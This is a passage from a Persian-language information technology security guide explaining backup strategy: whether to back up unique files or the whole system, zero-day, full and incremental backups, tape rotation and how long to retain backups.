ﺑﺨﺶ ﭘﻨﺠﻢ
ﻼ ﺑﻪ ﻧﻤﻮﻧﻪﻫﺎﻳﻲ ﺍﺷﺎﺭﻩ ﺷﺪﻩ ﺍﺳﺖ:
ﺍﻣﺮﻭﺯﻩ ﭼﻨﺪﻳﻦ ﺷﻜﻞ ﻣﺨﺘﻠﻒ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ ﮐﻪ ﺫﻳ ﹰ
٣٠٨
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﻼ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺳﺮﺟﻤﻌﻬﺎﻱ MD5ﻓﺎﻳﻠﻬﺎﻱ ﺷﻤﺎ ﺭﺍ ﺑﺮﺭﺳـﻲ ﻛﻨﻨـﺪ ﻭ ﺗﻨﻬـﺎ ﺍﺯ
ﺑﻌﻀﻲ ﺍﺯ ﺍﻳﻦ ﺧﺪﻣﺎﺕ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺴﻴﺎﺭ ﻣﺎﻫﺮﺍﻧﻪ ﻋﻤﻞ ﻛﻨﻨﺪ .ﻣﺜ ﹰ
ﻓﺎﻳﻠﻬﺎﻳﻲ ﻛﻪ ﻳﻜﺘﺎ ﻫﺴﺘﻨﺪ ﭘﺸﺘﻴﺒﺎﻥ ﺑﮕﻴﺮﻧﺪ .ﺩﺭﺍﻳﻨﺼﻮﺭﺕ ﺍﮔﺮ ﺷﻤﺎ ﻫﺰﺍﺭﺍﻥ ﺭﺍﻳﺎﻧﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛـﻪ ﺭﻭﻱ ﺗﻤـﺎﻡ ﺁﻧﻬـﺎ ﺑﺮﻧﺎﻣـﻪ Microsoft
Officeﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ،ﻫﻴﭽﻜﺪﺍﻡ ﺍﺯ ﻓﺎﻳﻠﻬﺎﻱ ﺁﻥ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺑﻪ ﭘﺸﺘﻴﺒﺎﻥ ﺍﺿﺎﻓﻪ ﻧﻤﻲﺷﻮﻧﺪ.
ﺍﺯ ﭼﻪ ﭼﻴﺰﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ ﻛﻨﻴﻢ
ﺩﻭ ﺭﻭﺵ ﻛﻠﻲ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ:
.١
ﺗﻬﻴﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺍﺯ ﻫﺮﺁﻧﭽﻪ ﻛﻪ ﺩﺭ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﻣﻨﺤﺼﺮ ﺑﻪ ﻓـﺮﺩ ﺍﺳـﺖ -ﺣـﺴﺎﺑﻬﺎﻱ ﻛـﺎﺭﺑﺮﻱ ،ﻓﺎﻳﻠﻬـﺎﻱ ﺩﺍﺩﻩ ﻭ ﺷـﺎﺧﻪﻫـﺎﻱ ﻣﻬـﻢ
ﺳﻴﺴﺘﻤﻲ ﻛﻪ ﺑﺮﺍﻱ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺍﺧﺘﺼﺎﺻﻲ ١١٨ﺷﺪﻩ ﺍﺳﺖ .ﺍﻳﻦ ﺷﻴﻮﻩ ﺩﺭ ﻧﻮﺍﺭ ﻳﺎ ﺩﻳﺴﻚ ﺻﺮﻓﻪﺟـﻮﻳﻲ ﻣـﻲﻛﻨـﺪ ﻭ ﺯﻣـﺎﻥ ﺗﻬﻴـﺔ ﻳـﻚ
ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺭﺍ ﻛﺎﻫﺶ ﻣﻲﺩﻫﺪ .ﺩﺭﺻﻮﺭﺕ ﺧﺮﺍﺏ ﺷﺪﻥ ﺳﻴﺴﺘﻢ ،ﺗﺮﻣﻴﻢ ﺭﺍ ﺍﺑﺘﺪﺍ ﺑﺎ ﻧﺼﺐ ﻣﺠﺪﺩ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺭﺍﻳﺎﻧﻪ ﺧﻮﺩ ﻭ ﺳﭙﺲ
ﻧﺼﺐ ﻣﺠﺪﺩ ﻫﻤﺔ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﺷﺮﻭﻉ ﻣﻲﻛﻨﻴﺪ ،ﻭ ﺑﻌﺪ ﺍﺯ ﺁﻥ ﻧﻮﺍﺭﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺧﻮﺩ ﺭﺍ ﺍﺣﻴﺎ ﻣﻲﻧﻤﺎﻳﻴﺪ.
.٢
ﺗﻬﻴﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺍﺯ ﻫﻤﻪ ﭼﻴﺰ -ﭼﻮﻥ ﺑﺎﺯﺳﺎﺯﻱ ﻳﻚ ﺳﻴﺴﺘﻢ ﺑﻄﻮﺭ ﻛﺎﻣﻞ ﺁﺳﺎﻧﺘﺮ ﺍﺯ ﺗﺮﻣﻴﻢ ﻳﻚ ﺗﻜﻪ ﺍﺯ ﺳﻴﺴﺘﻢ ﺍﺳﺖ؛ ﻭ ﻗﻴﻤﺖ ﻧﻮﺍﺭ ﻫﻢ
ﺍﺭﺯﺍﻥ ﻣﻲﺑﺎﺷﺪ.
ﻋﻤﻮﻣﹰﺎ ﺷﻴﻮﺓ ﺩﻭﻡ ﺑﺎﻳﺪ ﺗﺮﺟﻴﺢ ﺩﺍﺩﻩ ﺷﻮﺩ .ﻋﻠﻴﺮﻏﻢ ﺍﻳﻨﻜﻪ ﻗـﺴﻤﺘﻲ ﺍﺯ ﺍﻃﻼﻋـﺎﺗﻲ ﻛـﻪ ﺷـﻤﺎ ﺍﺯ ﺁﻥ ﭘـﺸﺘﻴﺒﺎﻥ ﺗﻬﻴـﻪ ﻛـﺮﺩﻩﺍﻳـﺪ ﭘﻴـﺸﺘﺮ ﺭﻭﻱ
ﺩﻳﺴﻜﻬﺎﻱ ﺍﺻﻠﻲ ﺗﻮﺯﻳﻊ ﺷﺪﻩ ﻳﺎ ﻧﻮﺍﺭﻫﺎﻳﻲ ﻛﻪ ﺑﺮﺍﻱ ﺑﺎﺭﮔﺬﺍﺭﻱ ﺳﻴﺴﺘﻢ ﺑﻪ ﺭﻭﻱ ﺩﻳﺴﮏ ﺳﺨﺖ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛـﺮﺩﻩﺍﻳـﺪ ﭘـﺸﺘﻴﺒﺎﻥﮔﻴـﺮﻱ
ﺷﺪﻩﺍﻧﺪ ،ﻭﻟﻲ ﻧﻮﺍﺭﻫﺎ ﻳﺎ ﺩﻳﺴﻜﻬﺎﻱ ﺗﻮﺯﻳﻊ ﻫﻢ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﮔﻢ ﻣﻲﺷﻮﻧﺪ .ﻋﻼﻭﻩ ﺑﺮ ﺁﻥ ﻫﻤﻴﻨﻄﻮﺭ ﻛﻪ ﻋﻤﺮ ﺳﻴـﺴﺘﻢ ﺷـﻤﺎ ﺯﻳـﺎﺩ ﻣـﻲﺷـﻮﺩ،
ﺑﺮﻧﺎﻣﻪﻫﺎ ﺭﻭﻱ ﺷﺎﺧﻪﻫﺎﻱ ﺭﺯﺭﻭﺷﺪﺓ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻧﺼﺐ ﻣﻲﺷﻮﻧﺪ؛ ﻣﺜﻞ ﺣﻔﺮﻩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻛﻪ ﻛﺸﻒ ﻭ ﺍﺻﻼﺡ ﻣـﻲﺷـﻮﻧﺪ ﻭ ﻳـﺎ ﺗﻐﻴﻴـﺮﺍﺕ
ﺩﻳﮕﺮﻱ ﻛﻪ ﺭﺥ ﻣﻲﺩﻫﻨﺪ .ﺍﮔﺮ ﺗﺎ ﻛﻨﻮﻥ ﻳﻜﺒﺎﺭ ﺳﻌﻲ ﻛﺮﺩﻩ ﺑﺎﺷﻴﺪ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺭﺍ ﺑﻌﺪ ﺍﺯ ﻭﻗﻮﻉ ﻳﻚ ﺧﺮﺍﺑﻲ ﺑﺎﺯﺳـﺎﺯﻱ ﻛﻨﻴـﺪ ،ﻣـﻲﺩﺍﻧﻴـﺪ ﺍﮔـﺮ
ﻫﺮﭼﻴﺰﻱ ﺳﺮ ﺟﺎﻱ ﺧﻮﺩ ﺑﺎﺷﺪ ﺭﻭﻧﺪ ﺍﻧﺠﺎﻡ ﻛﺎﺭ ﭼﻘﺪﺭ ﺳﺎﺩﻩﺗﺮ ﺍﺳﺖ.
ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﺗﻮﺻﻴﻪ ﻣﻲﺷﻮﺩ ﻛﻪ ﻫﻤﻪ ﭼﻴﺰ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺭﺍ )ﺑﻪ ﺍﻳﻦ ﻣﻌﻨﺎ ﻛﻪ ﻫﺮﭼﻴﺰﻱ ﻛﻪ ﺑﺮﺍﻱ ﻧﺼﺐ ﻣﺠـﺪﺩ ﺳﻴـﺴﺘﻢ ﻧﻴـﺎﺯ ﺍﺳـﺖ -ﺍﺯ ﺟﻤﻠـﻪ ﻫﻤـﺔ
ﻓﺎﻳﻠﻬﺎﻱ ﻧﻬﺎﻳﻲ ﺭﺍ( ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﺩﺭ ﺑﺎﺯﻩﻫﺎﻱ ﻣﻌﻴﻦ ﺯﻣﺎﻧﻲ ﺭﻭﻱ ﺭﺳﺎﻧﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺫﺧﻴﺮﻩ ﻛﻨﻴﺪ .ﻃﻮﻝ ﺍﻳﻦ ﺑﺎﺯﻩ ﺯﻣـﺎﻧﻲ ﺑـﻪ ﺳـﺮﻋﺖ ﺗﺠﻬﻴـﺰﺍﺕ
ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮ ﺷﻤﺎ ﻭ ﻣﻴﺰﺍﻥ ﻓﻀﺎﻱ ﺣﺎﻓﻈﺔ ﺍﺧﺘﺼﺎﺹ ﺩﺍﺩﻩ ﺷﺪﻩ ﺑﻪ ﭘـﺸﺘﻴﺒﺎﻧﻬﺎ ﻭ ﻫﻤﭽﻨـﻴﻦ ﻧﻴﺎﺯﻫـﺎﻱ ﺳـﺎﺯﻣﺎﻥ ﺷـﻤﺎ ﺑـﺴﺘﮕﻲ ﺩﺍﺭﺩ .ﺷـﺎﻳﺪ
ﺑﺨﻮﺍﻫﻴﺪ ﻫﻔﺘﻪﺍﻱ ﻳﻜﺒﺎﺭ ﭘﺸﺘﻴﺒﺎﻥ ﻛﺎﻣﻞ ﺗﻬﻴﻪ ﻛﻨﻴﺪ ،ﻭ ﻳﺎ ﺷﺎﻳﺪ ﺑﺨﻮﺍﻫﻴﺪ ﺗﻨﻬﺎ ﺩﻭ ﺑﺎﺭ ﺩﺭ ﺳﺎﻝ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ.
ﺍﻧﻮﺍﻉ ﭘﺸﺘﻴﺒﺎﻥﻫﺎ
ﺳﻪ ﻧﻮﻉ ﻛﻠﻲ ﭘﺸﺘﻴﺒﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ :ﭘﺸﺘﻴﺒﺎﻥ ﺳﻄﺢ ﺻﻔﺮ )ﺭﻭﺯ ﺻﻔﺮ( ،ﭘﺸﺘﻴﺒﺎﻥ ﻛﺎﻣﻞ ،ﻭ ﭘﺸﺘﻴﺒﺎﻥ ﺍﻓﺰﺍﻳﺸﻲ.
ﭘﺸﺘﻴﺒﺎﻥ ﺳﻄﺢ ﺻﻔﺮ )ﺭﻭﺯ ﺻﻔﺮ(
ﺍﺯ ﺳﻴﺴﺘﻢ ﺍﺻﻠﻲ ﺷﻤﺎ ﻳﻚ ﻛﭙﻲ ﺗﻬﻴﻪ ﻣﻲﻛﻨﺪ .ﻭﻗﺘﻲ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺑﺮﺍﻱ ﺑﺎﺭ ﺍﻭﻝ ﻧﺼﺐ ﻣﻲﺷﻮﺩ ،ﭘﻴﺶ ﺍﺯ ﺁﻧﻜﻪ ﺍﻓﺮﺍﺩ ﺷﺮﻭﻉ ﺑـﻪ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ
ﺁﻥ ﺑﻜﻨﻨﺪ ،ﺍﺯ ﻫﺮ ﻓﺎﻳﻞ ﻭ ﺑﺮﻧﺎﻣﻪ ﺩﺭ ﺳﻴﺴﺘﻢ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ ﻛﻨﻴﺪ .ﺍﮔﺮ ﺍﻳﻦ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﺑﻌﺪ ﺍﺯ ﻳﻚ ﻧﻔﻮﺫ ﻣﻮﻓﻘﻴﺖﺁﻣﻴﺰ ﺑـﻪ ﺳﻴـﺴﺘﻢ ﺍﻧﺠـﺎﻡ
ﻼ ﺑﻲﺍﺭﺯﺵ ﺑﺎﺷﺪ.
ﺷﻮﺩ ﻣﻤﻜﻦ ﺍﺳﺖ ﻛﺎﻣ ﹰ
ﭘﺸﺘﻴﺒﺎﻥ ﻛﺎﻣﻞ
ﺍﺯ ﻫﺮ ﻓﺎﻳﻞ ﺭﺍﻳﺎﻧﻪ ﻳﻚ ﻛﭙﻲ ﺭﻭﻱ ﭘﺸﺘﻴﺒﺎﻥ ﮔﺮﻓﺘﻪ ﻣﻲﺷﻮﺩ .ﺍﻳﻦ ﺭﻭﺵ ﻣﺸﺎﺑﻪ "ﭘﺸﺘﻴﺒﺎﻥ ﺭﻭﺯ ﺻﻔﺮ" ﺍﺳﺖ ،ﺟﺰ ﺍﻳﻨﻜﻪ ﻫـﺮ ﺍﺯ ﭼﻨـﺪﮔﺎﻩ ﺍﻧﺠـﺎﻡ
ﻣﻲﺷﻮﺩ.
118 Customized
ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
٣٠٩
ﭘﺸﺘﻴﺒﺎﻥ ﺍﻓﺰﺍﻳﺸﻲ
ﺗﻨﻬﺎ ﺍﺯ ﻓﺎﻳﻠﻬﺎﻳﻲ ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﻣﻲﺷﻮﺩ ﻛﻪ ﺑﻌﺪ ﺍﺯ ﻳﻚ ﺍﺗﻔﺎﻕ ﺧﺎﺹ )ﻣﺜﻞ ﺍﺻﻼﺡ ﺑﺮﻧﺎﻣﺔ ﻛﺎﺭﺑﺮﺩﻱ ﺩﺍﺭﺍﻱ ﺿﻌﻒ( ﻳﺎ ﺗﺎﺭﻳﺦ ﺧﺎﺹ )ﻣﺜﻞ ﺗﺎﺭﻳﺦ ﺗﻬﻴـﺔ
ﻻ ﺩﺭ ﻛﻨﺎﺭ ﻫﻢ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ .ﺍﻣـﺮﻭﺯﻩ ﺍﺳـﺘﺮﺍﺗﮋﻱ ﺭﺍﻳـﺞ
ﺁﺧﺮﻳﻦ ﭘﺸﺘﻴﺒﺎﻥ ﻛﺎﻣﻞ( ﺗﻐﻴﻴﺮ ﻛﺮﺩﻩﺍﻧﺪ .ﺍﺯ ﭘﺸﺘﻴﺒﺎﻥ ﻛﺎﻣﻞ ﻭ ﭘﺸﺘﻴﺒﺎﻥ ﺍﻓﺰﺍﻳﺸﻲ ﻣﻌﻤﻮ ﹰ
ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﺑﺸﺮﺡ ﺯﻳﺮ ﺍﺳﺖ:
•
•
ﺗﻬﻴﺔ ﭘﺸﺘﻴﺒﺎﻥ ﻛﺎﻣﻞ ﺩﺭ ﺍﻭﻟﻴﻦ ﺭﻭﺯ ﻫﻔﺘﻪ ﺑﺼﻮﺭﺕ ﻳﻚ ﻫﻔﺘﻪ ﺩﺭ ﻣﻴﺎﻥ؛ ﻭ
ﺗﻬﻴﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺍﻓﺰﺍﻳﺸﻲ ﺩﺭ ﭘﺎﻳﺎﻥ ﻫﺮ ﺍﺗﻔﺎﻗﻲ ﻛﻪ ﭘﺲ ﺍﺯ ﺗﻬﻴﺔ ﺁﺧﺮﻳﻦ ﭘﺸﺘﻴﺒﺎﻥ ﻛﺎﻣﻞ ﺩﺭ ﺳﻴﺴﺘﻢ ﻣﻲﺍﻓﺘﺪ .ﺍﻳﻦ ﻧﻮﻉ ﭘﺸﺘﻴﺒﺎﻥ ﺍﻓﺰﺍﻳﺸﻲ
ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺁﻧﺪﺳﺘﻪ ﻓﺎﻳﻠﻬﺎﻳﻲ ﺭﺍ ﺑﺎﻳﮕﺎﻧﻲ ﻣﻲﻛﻨﺪ ﻛﻪ ﺍﺯ ﺯﻣﺎﻥ ﺗﻬﻴﻪ ﺁﺧﺮﻳﻦ ﭘﺸﺘﻴﺒﺎﻥ ﻛﺎﻣﻞ ﺗﻐﻴﻴﺮ ﻛـﺮﺩﻩﺍﻧـﺪ ،ﮔـﺎﻫﻲ ﺍﻭﻗـﺎﺕ ﭘـﺸﺘﻴﺒﺎﻥ
ﺗﻔﺎﻭﺗﻲ ١١٩ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﺩ.
ﺍﻛﺜﺮ ﺭﺍﻫﺒﺮﺍﻥ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑﺰﺭﮒ ﺗﻬﻴﺔ ﭘـﺸﺘﻴﺒﺎﻧﻬﺎﻱ ﺧـﻮﺩ ﺭﺍ ﺑـﺮ ﺍﺳـﺎﺱ partitionﻳـﺎ ﺩﻳـﺴﻚﮔـﺮﺩﺍﻥ ﻃﺮﺍﺣـﻲ ﻭ ﺫﺧﻴـﺮﻩ ﻣـﻲﻛﻨﻨـﺪ.
ﻻ ﺑﻪ ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﻣﺨﺘﻠﻒ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﻧﻴﺎﺯ ﺩﺍﺭﻧﺪ .ﺑﺮ ﺍﺳﺎﺱ ﺍﻳـﻦ ﻧﻈﺮﻳـﻪ ﻛـﻪ ﻫـﺮ ﺗﻐﻴﻴـﺮﻱ ﻛـﻪ ﺷـﻤﺎ
partitionﻫﺎﻱ ﻣﺘﻔﺎﻭﺕ ﻣﻌﻤﻮ ﹰ
ﻣﻲﺩﻫﻴﺪ ﺑﺴﻴﺎﺭ ﭘﺮ ﺍﻫﻤﻴﺖ ﺍﺳﺖ ،ﺑﺮﺧﻲ ﺍﺯ partitionﻫﺎ ﻣﺜﻞ partitionﺳﻴﺴﺘﻢ ﺷﻤﺎ )ﺍﮔﺮ ﺍﺯ ﻫﻢ ﺟﺪﺍ ﺑﺎﺷﻨﺪ( ﻗﺎﻋﺪﺗﹰﺎ ﺑﺎﻳﺪ ﻫﺮ ﺯﻣـﺎﻥ ﻛـﻪ ﺩﺭ
ﺁﻧﻬﺎ ﺗﻐﻴﻴﺮ ﺍﻳﺠﺎﺩ ﻣﻲﺷﻮﺩ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﺷﻮﻧﺪ .ﺑﺮﺍﻱ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﺑﺠﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺍﻓﺰﺍﻳﺸﻲ ﺑﺎﻳﺪ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻧﻬﺎﻱ ﻛﺎﻣـﻞ ﺑﻬـﺮﻩ ﺑـﺮﺩ ،ﺯﻳـﺮﺍ
ﭘﺸﺘﻴﺒﺎﻥ ﺁﻧﻬﺎ ﻓﻘﻂ ﺩﺭﺻﻮﺭﺕ ﻛﺎﻣﻞ ﺑﻮﺩﻥ ﻗﺎﺑﻞ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺳﺖ .ﻫﻤﻴﻨﻄﻮﺭ ﺑﺨﺸﻬﺎﻳﻲ ﻛﻪ ﺗﻨﻬﺎ ﺑﺮﺍﻱ ﺫﺧﻴـﺮﻩ ﻛـﺮﺩﻥ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﻛـﺎﺭﺑﺮﺩﻱ
ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﻧﺪ ﺗﻨﻬﺎ ﻫﻨﮕﺎﻣﻲ ﺑﻪ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﻧﻴﺎﺯ ﺩﺍﺭﻧﺪ ﻛﻪ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺟﺪﻳﺪ ﻧﺼﺐ ﺷﻮﻧﺪ ﻭ ﻳﺎ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺑﺮﻧﺎﻣﻪﻫـﺎﻱ ﻣﻮﺟـﻮﺩ ﺗﻐﻴﻴـﺮ
ﻛﻨﻨﺪ.
ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱﻫﺎﻱ ﺍﻓﺰﺍﻳﺸﻲ ﺑﺮﺍﻱ partitionﻫﺎﻳﻲ ﻛﻪ ﺟﻬﺖ ﺫﺧﻴﺮﺓ ﻓﺎﻳﻠﻬﺎﻱ ﻛﺎﺭﺑﺮ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ ﻣﻨﺎﺳﺒﺘﺮ
ﺍﺳﺖ؛ ﺍﻣﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺷﻤﺎ ﺑﺨﻮﺍﻫﻴﺪ ﻣﻜﺮﺭﹰﺍ ﺍﺯ ﺍﻳﻦ ﻧﻮﻉ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﺗﺎ ﺩﺭﺻﻮﺭﺕ ﻭﻗﻮﻉ ﺧﺮﺍﺑﻲ ،ﻣﻘﺪﺍﺭ ﻛـﺎﺭﻱ ﻛـﻪ ﺍﻣﻜـﺎﻥ
ﺩﺍﺭﺩ ﺍﺯ ﺩﺳﺖ ﺑﺪﻫﻴﺪ ﺭﺍ ﺑﻪ ﺣﺪﺍﻗﻞ ﺭﺳﺎﻧﺪﻩ ﺑﺎﺷﻴﺪ.
ﻫﻨﮕﺎﻣﻴﻜﻪ ﭘﺸﺘﻴﺒﺎﻧﻴﻬﺎﻱ ﺍﻓﺰﺍﻳﺸﻲ ﺍﻳﺠﺎﺩ ﻣﻲﻛﻨﻴﺪ ،ﺍﺯ ﻳﻚ ﻣﺠﻤﻮﻋﻪ ﻧﻮﺍﺭﻫﺎ ﻳﺎ ﺩﻳﺴﻜﻬﺎﻱ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﺑﺼﻮﺭﺕ ﭼﺮﺧﺸﻲ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨﻴـﺪ.
ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺍﻣﺸﺐ ﻧﺒﺎﻳﺪ ﺑﺮ ﺭﻭﻱ ﻧﻮﺍﺭﻱ ﻛﻪ ﺑﺮﺍﻱ ﻧﺴﺨﻪ ﭘﺸﺘﻴﺒﺎﻥ ﺷﺐ ﮔﺬﺷﺘﻪ ﺍﺯ ﺁﻥ ﺍﺳـﺘﻔﺎﺩﻩ ﺷـﺪﻩ ﻧﻮﺷـﺘﻪ ﺷـﻮﺩ .ﺩﺭ ﻏﻴﺮﺍﻳﻨـﺼﻮﺭﺕ
ﭼﻨﺎﻧﭽﻪ ﺭﺍﻳﺎﻧﻪ ﺩﺭ ﺍﻭﺍﺳﻂ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﺍﻣﺸﺐ ﺧﺮﺍﺏ ﺷﻮﺩ ،ﺷﻤﺎ ﻫﻤﺔ ﺩﺍﺩﻩﻫﺎﻱ ﺭﻭﻱ ﺩﻳﺴﻚ ﺭﺍ ﺍﺯ ﺩﺳﺖ ﺧﻮﺍﻫﻴﺪ ﺩﺍﺩ :ﺩﺍﺩﻩﻫﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ
ﺍﻣﺸﺐ )ﭼﻮﻥ ﻧﺎﻗﺺ ﺍﺳﺖ( ،ﻭ ﺩﺍﺩﻩﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺷﺐ ﮔﺬﺷﺘﻪ )ﭼﻮﻥ ﻗﺴﻤﺘﻲ ﺍﺯ ﺁﻥ ﺑﻮﺳـﻴﻠﻪ ﭘـﺸﺘﻴﺒﺎﻥ ﺍﻣـﺸﺐ ﺟـﺎﻳﮕﺰﻳﻦ ﺷـﺪﻩ ﺍﺳـﺖ( .ﺑﻄـﻮﺭ ﺍﻳـﺪﻩﺁﻝ
ﺐ ﻫﻔﺘﻪ ﻳﻚ ﻧﻮﺍﺭ ﻣﺠﺰﺍ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ.
ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﺍﻓﺰﺍﻳﺸﻲ ﺭﺍ ﺷﺒﻲ ﻳﻜﺒﺎﺭ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ ،ﻭ ﺑﺮﺍﻱ ﻫﺮ ﺷ ﹺ
ﻣﻤﻜﻦ ﺍﺳﺖ ﻳﻚ ﻫﻔﺘﻪ ﻳﺎ ﻳﻚ ﻣﺎﻩ ﻃﻮﻝ ﺑﻜﺸﺪ ﺗﺎ ﻣﺘﻮﺟﻪ ﺷﻮﻳﺪ ﻛﻪ ﻳﻚ ﻓﺎﻳﻞ ﺣﺬﻑ ﺷﺪﻩ ﺍﺳﺖ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﺷـﻤﺎ ﺑﺎﻳـﺪ ﺑﻌـﻀﻲ ﺍﺯ ﻧﻮﺍﺭﻫـﺎﻱ
ﭘﺸﺘﻴﺒﺎﻥ ﺭﺍ ﺑﻤﺪﺕ ﻳﻜﻬﻔﺘﻪ ،ﺑﻌﻀﻲ ﺭﺍ ﻳﻜﻤﺎﻩ ،ﻭ ﺑﻌﻀﻲ ﺭﺍ ﭼﻨﺪﻳﻦ ﻣﺎﻩ ﻧﮕﻬﺪﺍﺭﻱ ﻛﻨﻴﺪ .ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎ ﭘﺸﺘﻴﺒﺎﻧﻬﺎﻱ ﺳﺎﻻﻧﻪ ﻳﺎ ۳ﻣﺎﻫـﺔ
ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﻫﻤﻴﺸﻪ ﺁﺭﺷﻴﻮ ﻣﻲﻛﻨﻨﺪ .ﺑﻌﻀﻲ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎ ﻧﻴﺰ ﭘﺸﺘﻴﺒﺎﻧﻬﺎﻱ ﺳﺎﻻﻧﻪ ﻳﺎ ﺩﻭﺳﺎﻻﻧﺔ ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﻫﻤﻴﺸﻪ ﻧﮕﻬـﺪﺍﺭﻱ ﻣـﻲﻛﻨﻨـﺪ،
ﭼﺮﺍﮐﻪ ﺑﻪ ﻫﺮﺣﺎﻝ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺩﺭ ﻣﻘﺎﺑﻞ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻛﻪ ﺁﻧﻬﺎ ﺭﻭﺯﻱ ﺑﻜﺎﺭ ﺁﻳﻨﺪ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﺍﻧـﺪﻛﻲ ﺑـﻪ ﺣـﺴﺎﺏ ﻣـﻲﺁﻳـﺪ .ﺩﺭ ﺑﻌـﻀﻲ ﺍﺯ
ﻛﺸﻮﺭﻫﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺷﺮﺍﻳﻂ ﻗﺎﻧﻮﻧﻲ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻛﻪ ﻧﮕﻬﺪﺍﺭﻱ ﭘﺸﺘﻴﺒﺎﻧﻬﺎﻱ ﺍﻧﻮﺍﻉ ﺧﺎﺻﻲ ﺍﺯ ﺩﺍﺩﻩﻫﺎ )ﻣﺜﻞ ﺛﺒﺘﻬﺎﻱ ﺣـﺴﺎﺑﺪﺍﺭﻱ( ﺭﺍ ﺑـﺮﺍﻱ
